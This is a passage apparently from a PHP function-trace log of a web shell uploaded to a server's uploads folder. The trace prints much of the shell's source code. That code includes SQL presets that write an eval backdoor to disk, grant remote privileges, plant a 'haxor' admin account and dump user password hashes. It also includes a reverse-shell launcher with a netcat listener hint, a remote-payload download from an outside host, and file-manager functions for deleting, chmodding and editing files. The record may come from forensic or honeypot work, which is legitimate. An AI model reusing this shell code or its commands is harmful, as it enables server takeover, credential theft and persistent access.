mysql_select_db($array[1][0], $conn);\n mysql_query(\'set names \' . $names, $conn);\n $spidercode = \'select \' . $array[3][0] . \' from `\' . $array[2][0] . \'`;\';\n $result = mysql_query($spidercode, $conn);\n if ($result) {\n while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {\n $data .= join(\' |x| \', $row) . "\\r\\n";\n $i++;\n }\n if ($data) {\n $file = strdir($array[4][0]);\n $msg .= filew($file, $data, \'w\') ? \'<h2> - Successfully off the DB</h2>\' : \'<h1> - Failed to export file</h1>\';\n $rows = array(\'file\' => $file, size(filesize($file)) => \'Total acquisition\' . $i . \'Article data\');\n } else {\n $msg .= \'<h1> - No data</h1>\';\n }\n } else {\n $msg .= \'<h1> - SQL execution failed</h1>\';\n $rows = array(\'errno\' => mysql_errno(), \'error\' => mysql_error());\n }\n } else {\n $msg .= \'<h1> - Off-database statement error</h1>\';\n }\n } elseif (!empty($sqlcode)) {\n mysql_select_db($sqlname, $conn);\n mysql_query(\'set names \' . $names, $conn);\n $result = mysql_query($sqlcode, $conn);\n if ($result) {\n $msg .= \'<h2> - SQL executed successfully</h2>\';\n while ($array = mysql_fetch_array($result, MYSQL_ASSOC)) {\n $rows[] = $array;\n }\n } else {\n $msg .= \'<h1> - SQL execution failed</h1>\';\n $rows = array(\'errno\' => mysql_errno(), \'error\' => mysql_error());\n }\n }\n mysql_free_result($result);\n } else {\n $msg = \'<h1>Connection\' . $type . \'Failure</h1>\';\n $rows = array(\'errno\' => mysql_errno(), \'error\' => mysql_error());\n }\n mysql_close($conn);\n } else {\n $msg = \'<h1>Not Support\' . $type . \'</h1>\';\n }\n break;\n }\n } else {\n $type = \'MySql\';\n $sqlhost = \'localhost:3306\';\n $sqluser = \'root\';\n $sqlpass = \'123456\';\n $sqlname = \'mysql\';\n $sqlcode = \'select version();\';\n $names = \'gbk\';\n }\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="sql">\';\n echo \'<table class="tables"><tr><th style="width:15%;">Name</th><th>Setup</th></tr>\';\n echo \'<tr><td>Support type</td><td>\';\n $dbs = array(\'MySql\', \'MsSql\', \'Oracle\', \'PostgreSql\');\n foreach ($dbs as $dbname) {\n echo \'<label><input type="radio" name="type" value="\' . $dbname . \'"\' . ($type == $dbname ? \' checked\' : \'\') . \'>\' . $dbname . \'</label> \';\n }\n echo \'</td></tr><tr><td>Connection</td><td>Address <input type="text" name="sqlhost" style="width:188px;" value="\' . $sqlhost . \'"> \';\n echo \'User <input type="text" name="sqluser" style="width:108px;" value="\' . $sqluser . \'"> \';\n echo \'Password <input type="text" name="sqlpass" style="width:108px;" value="\' . $sqlpass . \'"> \';\n echo \'DB Name <input type="text" name="sqlname" style="width:108px;" value="\' . $sqlname . \'"></td></tr>\';\n echo \'<tr><td>Statement<br>\';\n echo \'<select onchange="$(\\\'sqlcode\\\').value=options[selectedIndex].value">\';\n echo \'<option value="select version();">---Statement set---</option>\';\n echo \'<option value="select \\\'<?php eval ($_POST[cmd]);?>\\\' into outfile \\\'D:/web/shell.php\\\';">Write file</option>\';\n echo \'<option value="GRANT ALL PRIVILEGES ON *.* TO \\\'\' . $sqluser . \'\\\'@\\\'%\\\' IDENTIFIED BY \\\'\' . $sqlpass . \'\\\' WITH GRANT OPTION;">Open external connection</option>\';\n echo \'<option value="show variables;">System variable</option>\';\n echo \'<option value="create database haxor;">Create database</option>\';\n echo \'<option value="create table `haxor` (`id` INT(10) NOT NULL ,`user` VARCHAR(32) NOT NULL ,`pass` VARCHAR(32) NOT NULL) TYPE = MYISAM;">Create data table</option>\';\n echo \'<option value="show databases;">Show database</option>\';\n echo \'<option value="show tables from `\' . $sqlname . \'`;">Show data sheet</option>\';\n echo \'<option value="show columns from `haxor`;">Show table structure</option>\';\n echo \'<option value="drop table `haxor`;">Delete data table</option>\';\n echo \'<option value="select username,password,salt,email from `pre_ucenter_members` limit 0,30;">Display field</option>\';\n echo \'<option value="insert into `admin` (`user`,`pass`) values (\\\'haxor\\\', \\\'f1a81d782dea6a19bdca383bffe68452\\\');">Insert data</option>\';\n echo \'<option value="update `admin` set `user` = \\\'mi77i\\\',`pass` = \\\'50de237e389600acadbeda3d6e6e0b1f\\\' where `user` = \\\'haxor\\\' and `pass` = \\\'f1a81d782dea6a19bdca383bffe68452\\\' limit 1;">Change data</option>\';\n echo \'<option value="t00lsa \\\'discuzx25\\\' t00lsb \\\'pre_ucenter_members\\\' t00lsc \\\'username,password,salt,email\\\' t00lsfile \\\'\' . THISDIR . \'out.txt\\\';">Off the DB (MySql)</option>\';\n echo \'</select>\';\n echo \'</td><td><textarea name="sqlcode" id="sqlcode" style="width:680px;height:80px;">\' . htmlspecialchars($sqlcode) . \'</textarea></td></tr>\';\n echo \'<tr><td>Action</td><td><select name="names">\';\n $charsets = array(\'gbk\', \'utf8\', \'big5\', \'latin1\', \'cp866\', \'ujis\', \'euckr\', \'koi8r\', \'koi8u\');\n foreach ($charsets as $charset) {\n echo \'<option value="\' . $charset . \'"\' . ($names == $charset ? \' selected\' : \'\') . \'>\' . $charset . \'</option>\';\n }\n echo \'</select> <input type="submit" style="width:80px;" value="Go"></td></tr>\';\n echo \'</table></form>\';\n if ($rows) {\n echo \'<pre style="padding:5px;background:#F8F8F8;text-align:left;">\';\n ob_start();\n print_r($rows);\n $out = ob_get_contents();\n ob_end_clean();\n if (preg_match(\'~[\\\\x{4e00}-\\\\x{9fa5}]+~u\', $out) && function_exists(\'iconv\')) {\n $out = @iconv(\'UTF-8\', \'GB2312//IGNORE\', $out);\n }\n echo htmlspecialchars($out);\n echo \'</pre>\';\n }\n break;\n case "backshell":\n if (!empty($_POST[\'backip\']) && !empty($_POST[\'backport\'])) {\n $backip = $_POST[\'backip\'];\n $backport = $_POST[\'backport\'];\n $temp = $_POST[\'temp\'] ? $_POST[\'temp\'] : \'/tmp\';\n $type = $_POST[\'type\'];\n $msg = backshell($backip, $backport, $temp, $type);\n } else {\n $backip = $_SERVER[\'REMOTE_ADDR\'];\n $backport = \'443\';\n $temp = \'/tmp\';\n $type = \'pl\';\n }\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="backshell">\';\n echo \'<table class="tables"><tr><th style="width:15%;">Name</th><th>Setup</th></tr>\';\n echo \'<tr><td>Bind address</td><td><input type="text" name="backip" style="width:268px;" value="\' . $backip . \'"> (Your ip)</td></tr>\';\n echo \'<tr><td>Bind port</td><td><input type="text" name="backport" style="width:268px;" value="\' . $backport . \'"> (nc -vvlp \' . $backport . \')</td></tr>\';\n echo \'<tr><td>Temporary directory</td><td><input type="text" name="temp" style="width:268px;" value="\' . $temp . \'"> (Only Linux)</td></tr>\';\n echo \'<tr><td>Rebound method</td><td>\';\n $types = array(\'pl\' => \'Perl\', \'py\' => \'Python\', \'c\' => \'C-bin\', \'pcntl\' => \'Pcntl\', \'php\' => \'PHP\', \'phpwin\' => \'PHP-WS\');\n foreach ($types as $key => $name) {\n echo \'<label><input type="radio" name="type" value="\' . $key . \'"\' . ($key == $type ? \' checked\' : \'\') . \'>\' . $name . \'</label> \';\n }\n echo \'</td></tr><tr><td>Action</td><td><input type="submit" style="width:80px;" value="Go"></td></tr>\';\n echo \'</table></form>\';\n break;\n case "edit":\n case "editor":\n $file = strdir($_POST[\'godir\'] . \'/\' . $_POST[\'govar\']);\n $iconv = function_exists(\'iconv\');\n if (!file_exists($file)) {\n $msg = \'[Create new file]\';\n } else {\n $code = filer($file);\n $chst = \'Default\';\n if (preg_match(\'~[\\\\x{4e00}-\\\\x{9fa5}]+~u\', $code) && $iconv) {\n $chst = \'utf-8\';\n $code = @iconv(\'UTF-8\', \'GB2312//IGNORE\', $code);\n }\n $size = size(filesize($file));\n $msg = \'[File Permission: \' . substr(decoct(fileperms($file)), -4) . \'] [File size: \' . $size . \'] [File encoding: \' . $chst . \']\';\n }\n echo base64_decode(\'PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==\');\n echo \'<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="Find content" onclick="search($(\\\'keyword\\\').value);"> - \' . $msg . \'</div>\';\n echo \'<form name="editfrm" id="editfrm" method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">\';\n echo \'<input type="hidden" name="dir" id="dir" value="\' . dirname($file) . \'">\';\n echo \'<div class="actall">File <input type="text" name="filename" value="\' . $file . \'" style="width:528px;"> \';\n if ($iconv) {\n echo \'Coding <select name="tostr">\';\n $selects = array(\'normal\' => \'Default\', \'utf\' => \'utf-8\');\n foreach ($selects as $var => $name) {\n echo \'<option value="\' . $var . \'"\' . ($name == $chst ? \' selected\' : \'\') . \'>\' . $name . \'</option>\';\n }\n echo \'</select>\';\n }\n echo \'</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">\' . htmlspecialchars($code) . \'</textarea></div></form>\';\n echo \'<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\\\'editfrm\\\').submit();" value="Save" style="width:80px;"> \';\n echo \'<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="\' . dirname($file) . \'">\';\n subeval();\n echo \'<input type="button" onclick="$(\\\'backfrm\\\').submit();" value="Back" style="width:80px;"></form></div>\';\n break;\n case "upfiles":\n $updir = isset($_POST[\'updir\']) ? $_POST[\'updir\'] : $_POST[\'godir\'];\n $msg = \'[Maximum upload file \' . get_cfg_var("upload_max_filesize") . \'] [POST maximum submitted data \' . get_cfg_var("post_max_size") . \']\';\n $max = 10;\n if (isset($_FILES[\'uploads\']) && isset($_POST[\'renames\'])) {\n $uploads = $_FILES[\'uploads\'];\n $msgs = array();\n for ($i = 1; $i < $max; $i++) {\n if ($uploads[\'error\'][$i] == UPLOAD_ERR_OK) {\n $rename = $_POST[\'renames\'][$i] == \'\' ? $uploads[\'name\'][$i] : $_POST[\'renames\'][$i];\n $filea = $uploads[\'tmp_name\'][$i];\n $fileb = strdir($updir . \'/\' . $rename);\n $msgs[$i] = fileu($filea, $fileb) ? \'<br><h2>Uploaded successfully \' . $rename . \'</h2>\' : \'<br><h1>Upload failed \' . $rename . \'</h1>\';\n }\n }\n }\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">\';\n subeval();\n echo \'<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">\';\n echo \'<div class="actall"><p>Upload to directory <input type="text" name="updir" style="width:398px;" value="\' . $updir . \'"></p>\';\n for ($i = 1; $i < $max; $i++) {\n echo \'<p>File\' . $i . \' <input type="file" name="uploads[\' . $i . \']" style="width:300px;"> Rename <input type="text" name="renames[\' . $i . \']" style="width:128px;"> \' . $msgs[$i] . \'</p>\';\n }\n echo \'</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\\\'upsfrm\\\').submit();" value="Upload" style="width:80px;"> \';\n echo \'<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="\' . $updir . \'">\';\n subeval();\n echo \'<input type="button" onclick="$(\\\'backfrm\\\').submit();" value="Back" style="width:80px;"></form></div>\';\n break;\n default:\n if (isset($_FILES[\'upfile\'])) {\n if ($_FILES[\'upfile\'][\'name\'] == \'\') {\n $msg = \'<h1>Please select file</h1>\';\n } else {\n $rename = $_POST[\'rename\'] == \'\' ? $_FILES[\'upfile\'][\'name\'] : $_POST[\'rename\'];\n $filea = $_FILES[\'upfile\'][\'tmp_name\'];\n $fileb = strdir($nowdir . $rename);\n $msg = fileu($filea, $fileb) ? \'<h2>Upload files \' . $rename . \' Success</h2>\' : \'<h1>Upload files \' . $rename . \' Failure</h1>\';\n }\n }\n if (isset($_POST[\'act\'])) {\n switch ($_POST[\'act\']) {\n case "a":\n if (!$_POST[\'files\']) {\n $msg = \'<h1>Please select file \' . $_POST[\'var\'] . \'</h1>\';\n } else {\n $i = 0;\n foreach ($_POST[\'files\'] as $filename) {\n $i += @copy(strdir($nowdir . $filename), strdir($_POST[\'var\'] . \'/\' . $filename)) ? 1 : 0;\n }\n $msg = $msg = $i ? \'<h2>Co-copy \' . $i . \' Files to\' . $_POST[\'var\'] . \'Success</h2>\' : \'<h1>Co-copy \' . $i . \' Files to\' . $_POST[\'var\'] . \'Failure</h1>\';\n }\n break;\n case "b":\n if (!$_POST[\'files\']) {\n $msg = \'<h1>Please select file</h1>\';\n } else {\n $i = 0;\n foreach ($_POST[\'files\'] as $filename) {\n $i += @unlink(strdir($nowdir . $filename)) ? 1 : 0;\n }\n $msg = $i ? \'<h2>Altogether deleted! \' . $i . \' Files succeeded</h2>\' : \'<h1>Altogether deleted! \' . $i . \' Files failed</h1>\';\n }\n break;\n case "c":\n if (!$_POST[\'files\']) {\n $msg = \'<h1>Please select file \' . $_POST[\'var\'] . \'</h1>\';\n } elseif (!ereg("^[0-7]{4}\\$", $_POST[\'var\'])) {\n $msg = \'<h1>Permision value error</h1>\';\n } else {\n $i = 0;\n foreach ($_POST[\'files\'] as $filename) {\n $i += @chmod(strdir($nowdir . $filename), base_convert($_POST[\'var\'], 8, 10)) ? 1 : 0;\n }\n $msg = $i ? \'<h2>Total \' . $i . \' File modification permission are\' . $_POST[\'var\'] . \'Success</h2>\' : \'<h1>Total \' . $i . \' File modification permission are\' . $_POST[\'var\'] . \'Failure</h1>\';\n }\n break;\n case "d":\n if (!$_POST[\'files\']) {\n $msg = \'<h1>Please select file \' . $_POST[\'var\'] . \'</h1>\';\n } elseif (!preg_match(\'/(\\\\d+)-(\\\\d+)-(\\\\d+) (\\\\d+):(\\\\d+):(\\\\d+)/\', $_POST[\'var\'])) {\n $msg = \'<h1>Wrong time format \' . $_POST[\'var\'] . \'</h1>\';\n } else {\n $i = 0;\n foreach ($_POST[\'files\'] as $filename) {\n $i += @touch(strdir($nowdir . $filename), strtotime($_POST[\'var\'])) ? 1 : 0;\n }\n $msg = $i ? \'<h2>Total \' . $i . \' Files modified at\' . $_POST[\'var\'] . \'Success</h2>\' : \'<h1>Total \' . $i . \' Files modified at\' . $_POST[\'var\'] . \'Failure</h1>\';\n }\n break;\n case "e":\n $path = strdir($nowdir . $_POST[\'var\'] . \'/\');\n if (file_exists($path)) {\n $msg = \'<h1>Directory already exists \' . $_POST[\'var\'] . \'</h1>\';\n } else {\n $msg = @mkdir($path, 0777) ? \'<h2>Create a directory \' . $_POST[\'var\'] . \' Success</h2>\' : \'<h1>Create a directory \' . $_POST[\'var\'] . \' Failure</h1>\';\n }\n break;\n case "f":\n $context = array(\'http\' => array(\'timeout\' => 30));\n if (function_exists(\'stream_context_create\')) {\n $stream = stream_context_create($context);\n }\n $data = @file_get_contents($_POST[\'var\'], false, $stream);\n $filename = array_pop(explode(\'/\', $_POST[\'var\']));\n if ($data) {\n $msg = filew(strdir($nowdir . $filename), $data, \'wb\') ? \'<h2>Download \' . $filename . \' Success</h2>\' : \'<h1>Download \' . $filename . \' Failure</h1>\';\n } else {\n $msg = \'<h1>Download failed or download is not supported</h1>\';\n }\n break;\n case "rf":\n $files = explode(\'|x|\', $_POST[\'var\']);\n if (count($files) != 2) {\n $msg = \'<h1>Input error</h1>\';\n } else {\n $msg = @rename(strdir($nowdir . $files[1]), strdir($nowdir . $files[0])) ? \'<h2>Rename \' . $files[1] . \' for \' . $files[0] . \' Success</h2>\' : \'<h1>Rename \' . $files[1] . \' for \' . $files[0] . \' Failure</h1>\';\n }\n break;\n case "pd":\n $files = explode(\'|x|\', $_POST[\'var\']);\n if (count($files) != 2) {\n $msg = \'<h1>Input error</h1>\';\n } else {\n $path = strdir($nowdir . $files[1]);\n $msg = @chmod($path, base_convert($files[0], 8, 10)) ? \'<h2>Modify\' . $files[1] . \'Permission is\' . $files[0] . \'Success</h2>\' : \'<h1>Modify\' . $files[1] . \'Permission is\' . $files[0] . \'Failure</h1>\';\n }\n break;\n case "edit":\n if (isset($_POST[\'filename\']) && isset($_POST[\'filecode\'])) {\n if ($_POST[\'tostr\'] == \'utf\') {\n $_POST[\'filecode\'] = @iconv(\'GB2312//IGNORE\', \'UTF-8\', $_POST[\'filecode\']);\n }\n $msg = filew($_POST[\'filename\'], $_POST[\'filecode\'], \'w\') ? \'<h2>Saved successfully \' . $_POST[\'filename\'] . \'</h2>\' : \'<h1>Save failed \' . $_POST[\'filename\'] . \'</h1>\';\n }\n break;\n case "deltree":\n $deldir = strdir($nowdir . $_POST[\'var\'] . \'/\');\n if (!file_exists($deldir)) {\n $msg = \'<h1>Total dir \' . $_POST[\'var\'] . \' does not exist</h1>\';\n } else {\n $msg = deltree($deldir) ? \'<h2>Delete directory \' . $_POST[\'var\'] . \' Success</h2>\' : \'<h1>Delete directory \' . $_POST[\'var\'] . \' failure</h1>\';\n }\n break;\n }\n }\n $chmod = substr(decoct(fileperms($nowdir)), -4);\n if (!$chmod) {\n $msg .= \' - <h1>Cannot read directory</h1>\';\n }\n $array = showdir($nowdir);\n $thisurl = strdir(\'/\' . strtr($nowdir, array(ROOTDIR => \'\')) . \'/\');\n $nowdir = strtr($nowdir, array(\'\\\'\' => \'%27\', \'"\' => \'%22\'));\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<div class="actall"><form name="frm" id="frm" method="POST">\';\n subeval();\n echo (is_writable($nowdir) ? \'<h2>Path</h2>\' : \'<h1>Path</h1>\') . \' <input type="text" name="dir" id="dir" style="width:508px;" value="\' . strdir($nowdir . \'/\') . \'"> \';\n echo \'<input type="button" onclick="$(\\\'frm\\\').submit();" style="width:50px;" value="Go"> \';\n echo \'<input type="button" onclick="cd(\\\'\' . ROOTDIR . \'\\\');" style="width:68px;" value="Root dir"> \';\n echo \'<input type="button" onclick="cd(\\\'\' . THISDIR . \'\\\');" style="width:68px;" value="Current dir"> \';\n echo \'<select onchange="cd(options[selectedIndex].value);">\';\n echo \'<option>---Special Dir---</option>\';\n echo \'<option value="C:/RECYCLER/">Win-RECYCLER</option>\';\n echo \'<option value="C:/$Recycle.Bin/">Win-$Recycle</option>\';\n echo \'<option value="C:/Program Files/">Win-Program</option>\';\n echo \'<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup/">Win-Startup</option>\';\n echo \'<option value="C:/Documents and Settings/All Users/「开始」菜单/程序/启动/">Win-Startup (CN)</option>\';\n echo \'<option value="C:/Windows/Temp/">Win-TEMP</option>\';\n echo \'<option value="/usr/local/">Linux-local</option>\';\n echo \'<option value="/tmp/">Linux-tmp</option>\';\n echo \'<option value="/var/tmp/">Linux-var</option>\';\n echo \'<option value="/etc/ssh/">Linux-ssh</option>\';\n echo \'</select></form></div><div class="actall">\';\n echo \'<input type="button" value="New file" onclick="nf(\\\'edit\\\',\\\'newfile.php\\\');" style="width:68px;"> \';\n echo \'<input type="button" value="New Dir" onclick="txts(\\\'Directory name\\\',\\\'newdir\\\',\\\'e\\\');" style="width:68px;"> \';\n echo \'<input type="button" value="Download" onclick="txts(\\\'Download the file to the current directory\\\',\\\'http://hax.or.id/indo.txt\\\',\\\'f\\\');" style="width:68px;"> \';\n echo \'<input type="button" value="Bulk Up" onclick="go(\\\'upfiles\\\',\\\'\' . $nowdir . \'\\\');" style="width:68px;"> \';\n echo \'<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">\';\n subeval();\n echo \'<input type="hidden" name="dir" id="dir" value="\' . $nowdir . \'">\';\n echo \'<input type="file" name="upfile" style="width:286px;height:21px;"> \';\n echo \'<input type="button" onclick="$(\\\'upfrm\\\').submit();" value="Upload" style="width:50px;"> \';\n echo \'Renamed to <input type="text" name="rename" style="width:128px;">\';\n echo \'</form></div>\';\n echo \'<form name="frm1" id="frm1" method="POST"><table class="tables">\';\n subeval();\n echo \'<input type="hidden" name="dir" id="dir" value="\' . $nowdir . \'">\';\n echo \'<input type="hidden" name="act" id="act" value="">\';\n echo \'<input type="hidden" name="var" id="var" value="">\';\n echo \'<th><a href="javascript:void(0);" onclick="cd(\\\'\' . dirname($nowdir) . \'/\\\');">Parent directory</a></th><th style="width:5%">Perm</th><th style="width:17%">Creation time</th><th style="width:17%">Last Changed</th><th style="width:8%">Size</th><th style="width:8%">Action</th>\';\n if ($array) {\n asort($array[\'dir\']);\n asort($array[\'file\']);\n $dnum = $fnum = 0;\n foreach ($array[\'dir\'] as $path => $name) {\n $prem = substr(decoct(fileperms($path)), -4);\n $ctime = date(\'Y-m-d H:i:s\', filectime($path));\n $mtime = date(\'Y-m-d H:i:s\', filemtime($path));\n echo \'<tr>\';\n echo \'<td><a href="javascript:void(0);" onclick="cd(\\\'\' . $nowdir . $name . \'\\\');"><b>\' . strtr($name, array(\'%27\' => \'\\\'\', \'%22\' => \'"\')) . \'</b></a></td>\';\n echo \'<td><a href="javascript:void(0);" onclick="acts(\\\'\' . $prem . \'\\\',\\\'pd\\\',\\\'\' . $name . \'\\\');">\' . $prem . \'</a></td>\';\n echo \'<td>\' . $ctime . \'</td>\';\n echo \'<td>\' . $mtime . \'</td>\';\n echo \'<td>-</td>\';\n echo \'<td><a href="javascript:void(0);" onclick="dels(\\\'\' . $name . \'\\\');">Del</a> \';\n echo \' | <a href="javascript:void(0);" onclick="acts(\\\'\' . $name . \'\\\',\\\'rf\\\',\\\'\' . $name . \'\\\');">Ren</a></td>\';\n echo \'</tr>\';\n $dnum++;\n }\n foreach ($array[\'file\'] as $path => $name) {\n $prem = substr(decoct(fileperms($path)), -4);\n $ctime = date(\'Y-m-d H:i:s\', filectime($path));\n $mtime = date(\'Y-m-d H:i:s\', filemtime($path));\n $size = size(filesize($path));\n echo \'<tr>\';\n echo \'<td><input type="checkbox" name="files[]" value="\' . $name . \'"><a href="javascript:void(0);" onclick="go(\\\'edit\\\',\\\'\' . $name . \'\\\');">\' . strtr($name, array(\'%27\' => \'\\\'\', \'%22\' => \'"\')) . \'</a></td>\';\n echo \'<td><a href="javascript:void(0);" onclick="acts(\\\'\' . $prem . \'\\\',\\\'pd\\\',\\\'\' . $name . \'\\\');">\' . $prem . \'</a></td>\';\n echo \'<td>\' . $ctime . \'</td>\';\n echo \'<td>\' . $mtime . \'</td>\';\n echo \'<td align="right"><a href="javascript:void(0);" onclick="go(\\\'down\\\',\\\'\' . $name . \'\\\');">\' . $size . \'</a></td>\';\n echo \'<td><a target="_blank" href="\' . $thisurl . $name . \'">View</a> \';\n echo \' | <a href="javascript:void(0);" onclick="acts(\\\'\' . $name . \'\\\',\\\'rf\\\',\\\'\' . $name . \'\\\');">Ren</a></td>\';\n echo \'</tr>\';\n $fnum++;\n }\n }\n unset($array);\n echo \'</table>\';\n echo \'<div class="actall" style="text-align:left;">\';\n echo \'<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> \';\n echo \'<input type="button" value="Copy" style="width:50px;" onclick=\\\'txts("Copy path","\' . $nowdir . \'","a");\\\'> \';\n echo \'<input type="button" value="Delete" style="width:50px;" onclick=\\\'dels("b");\\\'> \';\n echo \'<input type="button" value="Perm" style="width:50px;" onclick=\\\'txts("Change Permission","0666","c");\\\'> \';\n echo \'<input type="button" value="Time" style="width:50px;" onclick=\\\'txts("Change the time","\' . $mtime . \'","d");\\\'> \';\n echo \'Total dir[\' . $dnum . \'] - Total file[\' . $fnum . \'] - Permission[\' . $chmod . \']</div></form>\';\n break;\n}\n?>\n<div class="footag"><?php \necho php_uname() . \'<br>\' . $_SERVER[\'SERVER_SOFTWARE\'];\n?>\n</div></div></div></body></html><?php \nunset($array);\n' /var/www/html/uploads/da.php 1 0
3 12 0 0.140818 909880 error_reporting 0 /var/www/html/uploads/da.php(1) : eval()'d code 8 1 1
3 12 1 0.140835 909920
3 12 R 0
3 13 0 0.140849 909880 ini_set 0 /var/www/html/uploads/da.php(1) : eval()'d code 9 2 'display_errors' 'Off'
3 13 1 0.140865 909952
3 13 R ''
3 14 0 0.140879 909880 ini_set 0 /var/www/html/uploads/da.php(1) : eval()'d code 10 2 'max_execution_time' 10000
3 14 1 0.140896 910016
3 14 R '30'
3 15 0 0.140909 909912 header 0 /var/www/html/uploads/da.php(1) : eval()'d code 11 1 'content-Type: text/html; charset=UTF-8'
3 15 1 0.140927 910088
3 15 R NULL
3 16 0 0.140942 910056 strdir 1 /var/www/html/uploads/da.php(1) : eval()'d code 23 1 '/var/www/html/uploads/da.php'
4 17 0 0.140956 910056 chop 0 /var/www/html/uploads/da.php(1) : eval()'d code 14 1 '/var/www/html/uploads/da.php'
4 17 1 0.140969 910088
4 17 R '/var/www/html/uploads/da.php'
4 18 0 0.140984 910056 str_replace 0 /var/www/html/uploads/da.php(1) : eval()'d code 14 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/var/www/html/uploads/da.php'
4 18 1 0.141006 910152
4 18 R '/var/www/html/uploads/da.php'
3 16 1 0.141021 910056
3 16 R '/var/www/html/uploads/da.php'
2 A /var/www/html/uploads/da.php(1) : eval()'d code 23 $myfile = '/var/www/html/uploads/da.php'
3 19 0 0.141047 910056 strpos 0 /var/www/html/uploads/da.php(1) : eval()'d code 24 2 '/var/www/html/uploads/da.php' 'eval()'
3 19 1 0.141061 910128
3 19 R FALSE
2 A /var/www/html/uploads/da.php(1) : eval()'d code 24 $myfile = '/var/www/html/uploads/da.php'
3 20 0 0.141085 910056 dirname 0 /var/www/html/uploads/da.php(1) : eval()'d code 25 1 '/var/www/html/uploads/da.php'
3 20 1 0.141098 910144
3 20 R '/var/www/html/uploads'
3 21 0 0.141112 910104 strdir 1 /var/www/html/uploads/da.php(1) : eval()'d code 25 1 '/var/www/html/uploads/'
4 22 0 0.141125 910104 chop 0 /var/www/html/uploads/da.php(1) : eval()'d code 14 1 '/var/www/html/uploads/'
4 22 1 0.141137 910136
4 22 R '/var/www/html/uploads/'
4 23 0 0.141157 910104 str_replace 0 /var/www/html/uploads/da.php(1) : eval()'d code 14 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/var/www/html/uploads/'
4 23 1 0.141177 910200
4 23 R '/var/www/html/uploads/'
3 21 1 0.141191 910104
3 21 R '/var/www/html/uploads/'
3 24 0 0.141203 910104 define 0 /var/www/html/uploads/da.php(1) : eval()'d code 25 2 'THISDIR' '/var/www/html/uploads/'
3 24 1 0.141217 910208
3 24 R TRUE
3 25 0 0.141231 910136 strdir 1 /var/www/html/uploads/da.php(1) : eval()'d code 26 1 '/uploads/da.php'
4 26 0 0.141244 910136 chop 0 /var/www/html/uploads/da.php(1) : eval()'d code 14 1 '/uploads/da.php'
4 26 1 0.141256 910168
4 26 R '/uploads/da.php'
4 27 0 0.141269 910136 str_replace 0 /var/www/html/uploads/da.php(1) : eval()'d code 14 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/uploads/da.php'
4 27 1 0.141289 910232
4 27 R '/uploads/da.php'
3 25 1 0.141302 910136
3 25 R '/uploads/da.php'
3 28 0 0.141315 910512 strtr 0 /var/www/html/uploads/da.php(1) : eval()'d code 26 2 '/var/www/html/uploads/da.php' ['/uploads/da.php' => '']
3 28 1 0.141330 910616
3 28 R '/var/www/html'
3 29 0 0.141343 910176 strdir 1 /var/www/html/uploads/da.php(1) : eval()'d code 26 1 '/var/www/html/'
4 30 0 0.141356 910176 chop 0 /var/www/html/uploads/da.php(1) : eval()'d code 14 1 '/var/www/html/'
4 30 1 0.141369 910208
4 30 R '/var/www/html/'
4 31 0 0.141382 910176 str_replace 0 /var/www/html/uploads/da.php(1) : eval()'d code 14 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/var/www/html/'
4 31 1 0.141401 910272
4 31 R '/var/www/html/'
3 29 1 0.141415 910176
3 29 R '/var/www/html/'
3 32 0 0.141428 910176 define 0 /var/www/html/uploads/da.php(1) : eval()'d code 26 2 'ROOTDIR' '/var/www/html/'
3 32 1 0.141441 910280
3 32 R TRUE
3 33 0 0.141454 910208 getinfo 1 /var/www/html/uploads/da.php(1) : eval()'d code 27 0
